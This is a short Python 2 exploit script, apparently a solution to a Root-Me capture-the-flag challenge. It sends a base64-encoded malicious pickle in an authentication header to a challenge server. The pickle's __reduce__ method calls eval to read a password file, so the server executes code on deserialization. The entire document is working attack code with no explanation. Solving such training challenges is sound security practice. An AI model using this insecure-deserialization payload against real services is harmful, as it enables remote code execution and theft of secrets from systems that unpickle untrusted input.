import socket
import base64
import pickle
 
host = 'challenge02.root-me.org'
port = 60005
 
class Exploit(object):
    def __reduce__(self):
        return (eval, ('eval(file("/challenge/app-script/ch5/.passwd", "r").read())',))
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
obj = Exploit()
req = '''AUTH admin HTTP/1.0\r\nAuthenticate: %s\r\n\r\n''' % base64.b64encode(pickle.dumps(obj))
sock.send(req)
 
res = sock.recv(4096)
while res:
    print res
    res = sock.recv(4096)